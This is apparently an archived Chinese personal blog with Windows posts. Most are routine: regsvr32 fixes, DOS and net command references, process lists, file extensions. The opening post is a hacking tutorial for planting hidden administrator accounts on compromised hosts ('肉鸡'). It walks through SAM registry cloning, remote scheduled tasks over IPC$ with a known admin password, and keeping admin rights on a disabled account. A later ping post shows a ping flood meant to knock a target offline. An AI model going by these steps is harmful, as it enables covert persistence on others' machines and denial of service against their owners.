一、如何在图形界面建立隐藏的超级用户

图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序)，如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows2000有两个注册表编辑器：regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户：hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入：regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制”。这里需要说明一下：最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入“regedit.exe”回车，启动注册表编辑器regedit.exe。打开键：

HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键“F”的值复制，并覆盖hacker$对应的项00000409下的键“F”的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除：

net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

二、如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。)

2、先与肉鸡建立连接,命令为：net use 13.50.97.238ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动)：

at 13.50.97.238 12:51 c:winntsystem32net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值：

at 13.50.97.238 12:55 c:winntregedit.exe /e hacker.reg
       HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：

copy 13.50.97.238admin$system32hacker.reg c:hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上

copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg

7、查看肉鸡时间：net time 13.50.97.238 然后用at命令将用户hacker$删除：

at 13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除：用

net use 13.50.97.238 /del 断开与肉鸡的连接。

net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use 13.50.97.238ipc$ "12345678" /user:"administrator"

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表：

at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办?

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提：1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话，你也可以远程开启，因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下：

1.想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下，我还没有想到好的办法，只能在命令行下用命令：“net user 用户名”一个一个来查看用户是否被禁用。

2.在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户(克隆之后，被禁用的用户hacker就会自动被激活了)： CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no

这样用户hacker就被禁用了(至少表面上是这样的)，当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令：net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式：at 肉鸡ip 时间 net user hacker /active:no

6.原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的“F”键被超级用户administrator在注册表的“F”键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内“C”健还是原来的“C”键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。

五、注意的几点事项

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。

3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过，未在NT上测试。

 

okone96 发表于:2007.01.22 10:46 ::分类: ( 操作系统 ) ::阅读:(99次) :: 评论 (0)
===========================================================
系统基础：regsvr32命令的用法
===========================================================
系统基础：regsvr32命令的用法
1. 修复IE浏览器
很多经常上网的朋友都有过这样的遭遇：IE不能打开新的窗口，用鼠标单击超链接也没有任何反应。这时重装IE一般能解决问题。其实不必这么麻烦，使用Regsvr32命令就可以轻松搞定。

具体的解决方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 actxprxy.dll”命令，单击“确定”按钮，这时会弹出一个信息对话框，提示“actxprxy.dll中的DllRegisterServer 成功”（如图），单击“确定”按钮，然后再在“运行”对话框中输入“regsvr32 shdocvw.dll”命令，单击“确定”按钮，重新启动计算机后IE就被修复了。

2. 解决Windows无法在线升级

Windows的漏洞很多，每隔一段时间就需要使用“Windows Update”进行在线升级，不过“Windows Update”经常出现无法使用的情况，这时，我们也可以使用Regsvr32来解决这个问题。

具体的解决方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 wupdinfo.dll”命令，单击“确定”按钮，这样在系统中就重新注册了“Windows Update”组件，重新启动计算机后问题即可解决。

3. 防范网络脚本病毒

网络脚本病毒嵌在网页中，上网时在不知不觉中机器就会感染上这种病毒。笔者认为单纯使用杀毒软件并不能有效地防范这些脚本病毒，必须从病毒传播的机理入手。网络脚本病毒的复制、传播都离不开FSO对象（File System Object，文件系统对象），因此禁用FSO对象就能有效地控制脚本病毒的传播。

具体的操作方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 /u scrrun.dll”命令即可禁用FSO对象；如果需要使用FSO对象，输入“regsvr32 scrrun.dll”命令即可。

4. 卸载Windows XP自带的无用功能

Windows XP以功能强大而著称，但有些功能却是我们平时用不上的，比如Windows XP自带的ZIP功能等，这些功能不仅占用了系统资源，而且远不如第三方软件强大。其实我们用Regsvr32命令可以很容易地卸载这些功能。

具体的操作方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 /u zipfldr.dll”命令，单击“确定”按钮，弹出卸载成功信息框后就完成了ZIP功能的卸载；要恢复ZIP功能，输入“regsvr32 zipfldr.dll”命令即可。如果你还想卸载掉图片的预览功能，直接键入“regsvr32 /u thumbvw.dll”命令即可；如果需要恢复，只需输入“regsvr32 thumbvw.dll”命令即可。

5. 让WMP播放器支持ＲＭ格式

很多朋友喜欢用Windows Media Player播放器，但是它不支持RM格式，难道非得安装其他播放软件吗？其实，使用Regsvr32命令也可以很容易的解决。笔者这里以Windows XP为例进行介绍，首先下载一个RM格式插件，解压缩后得到两个文件夹：Release（用于Windows 9x）和Release Unicode（用于Windows 2000/XP）。将Release Unicode文件夹下的RealMediaSplitter.ax文件拷贝到“系统盘符WINDOWSSystem32”目录下。然后，依次选择 “开始→运行”，在“运行”对话框中输入“regsvr32 RealMediaSplitter.ax”命令，单击“确定”按钮即可。接着，下载解码器，如Real Alternative，安装后就能用Windows Media Player播放RM格式的影音文件了。

提示：Regsvr 32命令是Windows中控件文件（如扩展名为DLL、OCX、CPL的文件）的注册和反注册工具。其命令格式为：Regsvr32 [/s] [/n] [/i[：cmdline]] dllname.

/u：卸载安装的控件，卸载服务器注册。

/s：注册成功后不显示操作成功信息框。

/i：调用DllInstall函数并把可选参数[cmdline]传给它，当使用/u时用来卸载DLL.

/n：不调用DllRegisterServer，该参数必须和/i一起使用

 

okone96 发表于:2007.01.22 10:37 ::分类: ( 操作系统 ) ::阅读:(92次) :: 评论 (0)
===========================================================
常用DOS命令
===========================================================
常用DOS命令
常用DOS命令
atty.126.com 2003-10-30 网络休闲庄会员俱乐部

一）MD——建立子目录

1．功能：创建新的子目录

2．类型：内部命令

3．格式：MD[盘符：][路径名]〈子目录名〉

4．使用说明：

（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；

（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。

C：、＞MD FOX （在当前驱动器C盘下创建子目录FOX）

C：、＞MD FOX 、USER （在FOX 子目录下再创建USER子目录）

 查看全文
okone96 发表于:2006.11.13 16:55 ::分类: ( 操作系统 ) ::阅读:(114次) :: 评论 (0)
===========================================================
网络最经典命令行－网络安全工作者的必杀技
===========================================================
网络最经典命令行－网络安全工作者的必杀技
1.最基本，最常用的，测试物理网络的

　　ping 192.168.0.8 －t ，参数－t是等待用户去中断测试

2.查看DNS、IP、Mac等

　　A.Win98：winipcfg
　　B.Win2000以上：Ipconfig/all

　　C.NSLOOKUP：如查看河北的DNS
　　C:>nslookup
　　Default Server: ns.hesjptt.net.cn
　　Address: 202.99.160.68
　　>server 202.99.41.2 则将DNS改为了41.2
　　> pop.pcpop.com
　　Server: ns.hesjptt.net.cn
　　Address: 202.99.160.68

　　Non-authoritative answer:
　　Name: pop.pcpop.com
　　Address: 202.99.160.212

3.网络信使

　　Net send 计算机名/IP　* (广播) 传送内容，注意不能跨网段
　　net stop messenger 停止信使服务，也可以在面板－服务修改
　　net start messenger 开始信使服务

4.探测对方对方计算机名，所在的组、域及当前用户名 （追捕的工作原理）

　　ping －a IP －t ，只显示NetBios名
　　nbtstat -a 192.168.10.146 比较全的

5.netstat -a 显示出你的计算机当前所开放的所有端口

　　netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址

　　arp -a

7.在代理服务器端

　　捆绑IP和MAC地址，解决局域网内盗用IP！：
　　ARP －s 192.168.10.59 00 －50－ff－6c－08－75
　　解除网卡的IP与MAC地址的绑定：
　　arp -d 网卡IP

8.在网络邻居上隐藏你的计算机

　　net config server /hidden:yes
　　net config server /hidden:no 则为开启

9.几个net命令

　　A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。
　　比如：查看这个IP上的共享资源，就可以
　　C:>net view 192.168.10.8
　　在 192.168.10.8 的共享资源
　　资源共享名 类型 用途 注释
　　--------------------------------------
　　网站服务 Disk
　　命令成功完成。

　　B.查看计算机上的用户帐号列表 net user
　　C.查看网络链接 net use
　　例如：net use z: 192.168.10.8movie 将这个IP的movie共享目录映射为本地的Z盘
　　D.记录链接 net session
　　例如: C:>net session
　　计算机 用户名 客户类型 打开空闲时间
　　-------------------------------------------------------------------------------
　　192.168.10.110 ROME Windows 2000 2195 0 00:03:12

　　192.168.10.51 ROME Windows 2000 2195 0 00:00:39
　　命令成功完成。

10.路由跟踪命令

　　A.tracert pop.pcpop.com
　　B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％

11.关于共享安全的几个命令

　　A.查看你机器的共享资源 net share
　　B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！）
　　net share c$ /d
　　net share d$ /d
　　net share ipc$ /d
　　net share admin$ /d
　　注意$后有空格。
　　C.增加一个共享：
　　c:net share mymovie=e:downloadsmovie /users:1
　　mymovie 共享成功。
　　同时限制链接用户数为1人。

12.在DOS行下设置静态IP

　　A.设置静态IP
　　CMD
　　netsh
　　netsh>int
　　interface>ip
　　interface ip>set add "本地链接" static IP地址 mask gateway
　　B.查看IP设置
　　interface ip>show address

　　Arp
　　显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。

　　语法
　　arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

　　参数
　　-a [InetAddr] [-N IfaceAddr]
　　显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项，请使用带有 InetAddr 参数的 arp -a，此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表，请使用 -N IfaceAddr 参数，此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
　　-g [InetAddr] [-N IfaceAddr]
　　与 -a 相同。
　　-d InetAddr [IfaceAddr]
　　删除指定的 IP 地址项，此处的 InetAddr 代表 IP 地址。对于指定的接口，要删除表中的某项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项，请使用星号 (*) 通配符代替 InetAddr。
　　-s InetAddr EtherAddr [IfaceAddr]
　　向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。
　　/?
　　在命令提示符显示帮助。
　　注释
　　InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
　　物理地址 EtherAddr 由六个字节组成，这些字节用十六进制记数法表示并且用连字符隔开（比如，00-AA-00-4F-2A-9C）。
　　通过 -s 参数添加的项属于静态项，它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动，这些项会被删除。要创建永久的静态 ARP 缓存项，请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时，该命令才可用。
　　范例
　　要显示所有接口的 ARP 缓存表，可键入：

　　arp -a

　　对于指派的 IP 地址为 10.0.0.99 的接口，要显示其 ARP 缓存表，可键入：

　　arp -a -N 10.0.0.99

　　要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项，可键入：

　　arp -s 10.0.0.80 00-AA-00-4F-2A-9C

　　At
　　计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用，则 at 列出已计划的命令。

　　语法
　　at [ComputerName] [{[ID] [/delete]　/delete [/yes]}]

　　at [[ComputerName] hours:minutes [/interactive] [{/every:date[,...]　/next:date[,...]}] command]

　　参数
　　 computername
　　指定远程计算机。如果省略该参数，则 at 计划本地计算机上的命令和程序。
　　ID
　　指定指派给已计划命令的识别码。
　　/delete
　　取消已计划的命令。如果省略了 ID，则计算机中所有已计划的命令将被取消。
　　/yes
　　删除已计划的事件时，对来自系统的所有询问都回答“是”。
　　hours:minutes
　　指定命令运行的时间。该时间用 24 小时制（即从 00:00 [午夜] 到 23:59）的 小时: 分钟格式表示。
　　/interactive
　　对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
　　/every:
　　在每个星期或月的指定日期（例如，每个星期四，或每月的第三天）运行 command 命令。
　　date
　　指定运行命令的日期。可以指定一周的某日或多日（即，键入 M、T、W、Th、F、S、Su）或一个月中的某日或多日（即，键入从 1 到31 之间的数字）。用逗号分隔多个日期项。如果省略了 date，则 at 使用该月的当前日。
　　/next:
　　在下一个指定日期（比如，下一个星期四）到来时运行 command。
　　command
　　指定要运行的 Windows 命令、程序（.exe 或 .com 文件）或批处理程序（.bat 或 .cmd 文件）。当命令需要路径作为参数时，请使用绝对路径，也就是从驱动器号开始的整个路径。如果命令在远程计算机上，请指定服务器和共享名的通用命名协定 (UNC) 符号，而不是远程驱动器号。
　　/?
　　在命令提示符显示帮助。
　　注释
　　Schtasks 是功能更为强大的超集命令行计划工具，它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务，都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息，请参阅“相关主题”。

　　使用 at
　　使用 at 命令时，要求您必须是本地 Administrators 组的成员。

 

okone96 发表于:2006.11.13 16:54 ::分类: ( 操作系统 ) ::阅读:(100次) :: 评论 (0)
===========================================================
三类2000系统进程总列表
===========================================================
三类2000系统进程总列表
三类2000系统进程总列表
最基本的系统进程（也就是说，这些进程是系统运行的基本条件，有了这些进程，系统就能正常运行）
smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务) 产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务) ->netlogon
svchost.exe 包含很多系统服务 !!!->eventsystem,
(SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe 资源管理器
(internat.exe 托盘区的拼音图标)

附加的系统进程（这些进程不是必要的，你可以根据需要通过服务管理器来增加或减少）

mstask.exe 允许程序在指定时间运行。(系统服务)->schedule
regsvc.exe 允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe->msftpsvc,w3svc,iisadmn
tlntsvr.exe->tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)
termsrv.exe ->termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)

以下全是系统服务,并且很少会用到，如果你暂时用不着,应该关掉(对安全有害 )

tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。(系统服务)->simptcp
支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库.->rpclocator(区 RpcSs)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。(系统服务)
msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统，或其它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)!!!
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息，然后将消息传递到运行在这台计算机上 SNMP 管理程序。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)

 

okone96 发表于:2006.11.13 16:53 ::分类: ( 操作系统 ) ::阅读:(78次) :: 评论 (0)
===========================================================
操作系统进程描述
===========================================================
操作系统进程描述
system process
进程文件: [system process] or [system process]
进程名称: Windows内存处理系统进程
描述: Windows页面内存管理进程，拥有0级优先。
是否为系统进程: 是
alg.exe
进程文件: alg or alg.exe
进程名称: 应用层网关服务
描述: 这是一个应用层网关服务用于网络共享。
是否为系统进程: 是

 查看全文
okone96 发表于:2006.11.13 16:51 ::分类: ( 操作系统 ) ::阅读:(103次) :: 评论 (0)
===========================================================
常见文件扩展名及简要说明
===========================================================
常见文件扩展名及简要说明
A 对象代码库文件
AAM Authorware shocked文件
AAS Authorware shocked包
ABF Adobe二进制屏幕字体
ABK CorelDRAW自动备份文件
ABS 该类文件有时用于指示一个摘要（就像在一篇有关科学方面的文章的一个摘要或概要，取自abstract）
ACE Ace压缩档案格式
ACL CorelDRAW 6键盘快捷键文件
ACM Windows系统目录文件
ACP Microsoft office助手预览文件
ACR 美国放射医学大学文件格式
ACT Microsoft office助手文件
ACV OS/2的驱动程序，用于压缩或解压缩音频数据
AD After Dark屏幕保护程序  查看全文
okone96 发表于:2006.11.13 16:47 ::分类: ( 操作系统 ) ::阅读:(133次) :: 评论 (0)
===========================================================
禁止运行命令解释器和批处理文件
===========================================================
禁止运行命令解释器和批处理文件
禁止运行命令解释器和批处理文件

通过修改注册表，可以禁止用户使用命令解释器(CMD.exe)和运行批处理文件(.bat文件)。新建一个双字节(REG＿DWORD)执行HKEY＿CURRENT＿USER＼Software＼Policies＼ Microsoft＼Windows＼System＼DisableCMD，修改其值为2，命令解释器和批处理文件都不能被运行。修改其值为1，则只是禁止命令解释器的运行。

 

okone96 发表于:2006.11.13 16:46 ::分类: ( 操作系统 ) ::阅读:(114次) :: 评论 (0)
===========================================================
Ping 命令完全讲解
===========================================================
Ping 命令完全讲解
对于ping指令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。

现在我就参照ping指令的辅助说明来给大家讲我使用ping时会用到的技巧，ping只有在安装了TCP/IP通讯协议以后才可以使用： 　　ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list 　　Options: 　　-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 　　不停的ping地方主机，直到你按下Control-C。 　　此功能?有什么特别的技巧，不过可以配合其它参数使用，将在下面提到。 　　-a Resolve addresses to hostnames. 　　解析计算机NetBios名。 　　例：C:＼>ping -a 192.168.1.21 　　Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: 　　Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 　　Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 　　Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 　　Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 　　Ping statistics for 192.168.1.21: 　　Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: 　　Minimum = 0ms, Maximum = 0ms, Average = 0ms 　　从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。 　　-n count Number of echo requests to send. 　　发送count指定的Echo数据包数。 　　在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下?知： 　　C:＼>ping -n 50 202.103.96.68 　　Pinging 202.103.96.68 with 32 bytes of data: 　　Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 　　Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 　　Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 　　Request timed out. 　　……………… 　　Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 　　Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 　　Ping statistics for 202.103.96.68: 　　Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: 　　Minimum = 40ms, Maximum = 51ms, Average = 46ms 　　从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。 　　-l size Send buffer size. 　　定义echo数据包大小。 　　在默认的情?下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞(也许还包括其它系统)就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能当机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其它参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的指令：(以下介绍带有危险性，只用于试验，请勿轻易施于别人计算机上，否?后果自负) 　　C:＼>ping -l 65500 -t 192.168.1.21 　　Pinging 192.168.1.21 with 65500 bytes of data: 　　Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 　　Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 　　……………… 　　这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许?有什么效果，但如果有很多台计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。 　　-f Set Don't Fragment flag in packet. 　　在数据包中发送“不要分段”标志。 　　在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。 　　-i TTL Time To Live. 　　指定TTL值在对方的系统里停留的时间。 　　此参数同样是帮助你检查网络运转情况的。 　　